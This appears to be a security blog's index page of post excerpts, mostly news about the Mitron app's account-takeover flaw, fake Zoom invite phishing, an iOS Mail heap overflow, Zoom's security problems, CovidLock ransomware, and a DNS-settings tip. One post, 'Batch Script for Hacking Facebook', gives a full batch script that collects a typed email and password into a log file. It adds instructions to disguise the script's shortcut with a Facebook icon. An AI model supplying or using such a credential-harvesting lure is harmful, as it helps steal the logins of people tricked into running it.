Posts

Vulnerabilities and Owner Claims of so called Indian app rival for China's TikTok

Image
Mitron which is a viral app contains a highly critical, unpatched vulnerability that could let anyone hack into any user account without the need of a password or interaction from the targeted users. Mitron means “friends” in Hindi and it is not an Indian product. The viral video social platform app TikTok, owned by China had to face outrage from everywhere due to its lack of data security and ethnopolitical reasons. This led to the emergence of new alternatives one of which is the Mitron app for Android. Mitron video social platform recently was in the news when this Android app were installed by more than 5 million users and received a 5-star rating by 250,000 users in just 48 days after being released on the Google Play Store. Mitron is not owned by any big company, and the app became a sensation overnight, taking advantage of the name as it is popular in India as a commonly used greeting by Prime Minister Narendra Modi. Also, an initiative by the PM called ‘vocal for local’ to make...

Recheck the URLs of Zoom meeting invites, Hackers are faking them to steal your data

Image
Zoom may have fixed many of its own security issues, but it’ll never be immune to hackers trying to trick the company’s users. Malicious actors are now targeting users with fake Zoom meeting emails in order to steal their personal information and login credentials, according to email cybersecurity with cyber security.  This particular phishing scheme uncovered by Abnormal Security weaponizes many people’s fear of losing their job due to the economic downturn during the coronavirus pandemic. To date, more than 26 million people in the U.S. have filed for unemployment since the pandemic began. These spoofed emails come in the form of a Zoom meeting reminder with HR concerning the termination of the recipient’s employment. The email contains a Zoom meeting invitation link, which is actually the hacker’s phishing site designed to mimic the look of Zoom’s login page. In reality, clicking the meeting link forwards the target to a page hosted at the URL “zoom-emergency....

IPhone could be hacked through IOS Mail Application

Image
It can be exploited remotely by an attacker sending email, and it can use a large amount of RAM from the device. First it slow down your iPhone and then force to crash. The attack’s scope consists of sending a specially crafted email to a victim’s mailbox enabling it to trigger the vulnerability in the context of iOS MobileMail application on iOS 12 or maild on iOS 13. Based on Research and Threat Intelligence, we surmise with high confidence that these vulnerabilities – in particular, the  remote heap overflow  – are widely exploited in the wild in targeted attacks by an advanced threat operator(s). Heap Overflow Bug A heap overflow or heap overrun is a type of buffer overflow that occurs in the heap data area. Heap overflows are exploitable in a different manner to that of stack-based overflows. Memory on the heap is dynamically allocated at runtime and typically contains program data. What is the Vulnerability? The suspicious events included strings commonly u...

Zoom Video conferencing software vulnerable to Cyber Attacks-A detailed guide to use it or not

Image
Over the past few weeks, the use of Zoom video conferencing software has exploded ever since it emerged the platform of choice to host everything from cabinet meetings  to yoga classes amidst the ongoing coronavirus outbreak and work from home became the new normal. The app has skyrocketed to 200 million daily users  from an average of 10 million in December — along with a 535 percent increase in daily traffic to its download page in the last month — but it's also seen a massive uptick in Zoom's problems, all of which stem from sloppy design practices and security implementations. Zoom may never have designed its product beyond enterprise chat initially, but with the app now being used in a myriad number of ways and by regular consumers, the company's full scope of gaffes have come into sharp focus — something it was able to avoid all this time. But if this public scrutiny can make it a more secure product, it can only be a good thing in the long run. ...

CovidLock- Coronavirus tracking app locks up Android phones for ransom

Image
If you are thinking of installing an app on your Android device from a third-party source to keep track of the coronavirus outbreak, think again. It has been discovered that CovidLock posing as a COVID-19 tracking app is a malicious ransomware Android app in disguise that is locking users out of their phones. A malicious Android app that supposedly helps track cases of the coronavirus actually locks users’ phones and demands a ransom in order to restore access. Dubbed CovidLock, the newly discovered ransomware performs a screen-lock attack by forcing a change in the password required to unlock a phone, explains DNS threat intelligence company.  For Android Nougat devices and later versions, the attack only works if the user never bothers to set a password in the first place. Victims are given a 48-hour deadline to pay a $100 ransom in bitcoin. To ratchet up the stakes, the ransomware program also threatens to erase one’s contacts, photos, videos and memory, as well ...

Batch Script for Hacking Facebook

Open Notepad, Copy and paste the content below in the Notepad. @echo off colour a title login echo Please Enter Email Jddress and Password echo. echo. cd.c:\logs" set/p user=username set/p pass=password echo username="%user%" password="%pass%">logs.txt start www&facebook&com exit Note:while copying 12th line change the& to . >save as (anything).bat >click on c drive and create folder named logs >now create shortcut file on the bat >right click on the shortcut and click properties and change the icon to a facebook icon All the things are configured. Now test it. Happy Hacking :)

Hack for Fast browsing of Internet by changing DNS settings

In this Blog we'll discuss about free OpenDNS services that are one of the most popular free DNS services that were started to provide an alternative method to those who were discontented with their existing DNS services. Just follow the below steps to do so. Step 1:   Go To Control Panel ---> Network and Internet options. Step 2: Now you need to click on “Change Adapter settings” Step 3: Click on your internet connection that you have currently connected and open properties of that network. Step 4: Now click on the Internet Protocol Version 4 (TCP/IPv4) and click on Properties. Now choose the following DNS server addresses to get a faster internet speed . Preferred DNS server: 208.67.222.222 Alternate DNS server: 208.67.220.220 . Step 5: Now click on OK and now configure Ipv6 Preferred DNS server: 2620:0:ccc::2 Alternate DNS server: 2620:0:ccd::2 Save all the settings, and now you are using a DNS with fast internet browsing. That’s  it! You a...